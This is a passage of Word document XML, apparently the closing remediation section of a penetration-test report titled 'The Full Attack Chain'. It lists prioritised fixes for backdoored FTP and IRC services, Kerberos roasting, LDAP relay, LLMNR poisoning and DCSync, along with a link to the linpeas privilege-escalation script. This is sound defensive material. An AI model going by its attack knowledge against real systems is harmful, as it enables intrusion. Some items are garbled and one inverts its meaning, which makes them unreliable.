        <w:spacing w:line="249" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2161" w:right="1750" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remove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vsftpd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2.3.4,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UnrealIRCd,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other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known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backdoored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service versions from all systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="250"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Priority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>HIGH:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2161" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto" w:before="263" w:after="0"/>
        <w:ind w:left="2161" w:right="2580" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enforce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Kerberos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pre-authentication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user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accounts-remove DONT_REQ_PREAUTH flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2161" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2161" w:right="1357" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Implement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gMSA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(Group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Managed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Service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Accounts)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service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accounts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to eliminate static, crackable passwords.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2161" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2161" w:right="1315" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Audit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ACLs-use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BloodHound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internally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identify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remove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unintended permission grants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2160" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="304" w:lineRule="exact" w:before="0" w:after="0"/>
        <w:ind w:left="2160" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enable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LDAP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signing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channel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binding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prevent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LDAP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relay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attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2161" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2161" w:right="1325" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enforce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strong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password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policies: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minimum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15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characters,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complexity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required, no common words.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2160" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2160" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Deploy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Microsoft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Defender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Identity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(MDI)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Kerberos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anomaly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detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="255"/>
        <w:ind w:left="715"/>
      </w:pPr>
      <w:bookmarkStart w:name="Priority 3-MEDIUM:" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Priority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>MEDIUM:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2146" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="98" w:after="0"/>
        <w:ind w:left="2146" w:right="1480" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Implement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Tiered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Administration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Model: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separate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Tier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0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(DC),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Tier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1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(servers), Tier 2 (workstations) admin accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="304" w:lineRule="exact" w:before="0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Deploy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MFA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privileged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accounts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remote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access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="9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Remove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unnecessary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SUID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bits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non-essential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binaries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(e.g.,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nmap).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2146" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto" w:before="10" w:after="0"/>
        <w:ind w:left="2146" w:right="1182" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Conduct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regular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BloodHound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scans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(monthly)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identify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attack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paths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before attackers do.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2146" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2146" w:right="1689" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Implement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network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segmentation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—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workstations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should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communicate directly with servers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="303" w:lineRule="exact" w:before="0" w:after="0"/>
        <w:ind w:left="2145" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Deploy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Privileged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Access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Workstation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(PAW)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Domain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Admin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operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="303" w:lineRule="exact"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2146" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="79" w:after="0"/>
        <w:ind w:left="2146" w:right="1767" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enable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Credential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Guard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Windows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10/11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systems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prevent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in-memory credential theft.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="254"/>
        <w:ind w:left="715"/>
      </w:pPr>
      <w:bookmarkStart w:name="Priority 4-STRATEGIC:" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Priority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>STRATEGIC:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2146" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto" w:before="98" w:after="0"/>
        <w:ind w:left="2146" w:right="2227" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Schedule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quarterly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audits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covering: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privileged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groups,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SPN registrations, ACL review, GPO audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2146" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2146" w:right="1370" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Deploy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honey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accounts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fake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SPNs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disabled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pre-auth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generate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high-fidelity attacker detection alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2146" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2146" w:right="1489" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Establish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awareness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training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program-LLMNR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poisoning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only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works because users access non-existent shares.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2146" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2146" w:right="1366" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Implement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Event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(SIEM)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solution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with alerting on: Event 4768 (TGT requests), Event 5136 (AD object modifications), Event 4769 (unusual TGS requests), DCSync replication events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2146" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2146" w:right="1707" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Consider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Team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exercises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every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6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months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validate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effectiveness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 implemented controls.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="136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21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214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14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5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214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Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:i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60" w:right="359"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:i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0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4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hyperlink" Target="https://github.com/carlospolop/PEASSng/releases/latest/download/linpeas.sh" TargetMode="External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pn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pn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image" Target="media/image41.jpeg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpe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jpeg"/><Relationship Id="rId5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Ahsan</dc:creator>
  <dc:subject>The Full Attack Chain</dc:subject>
  <dc:title>Task Report</dc:title>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-08T10:12:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-08T10:12:10Z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2026-06-08T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>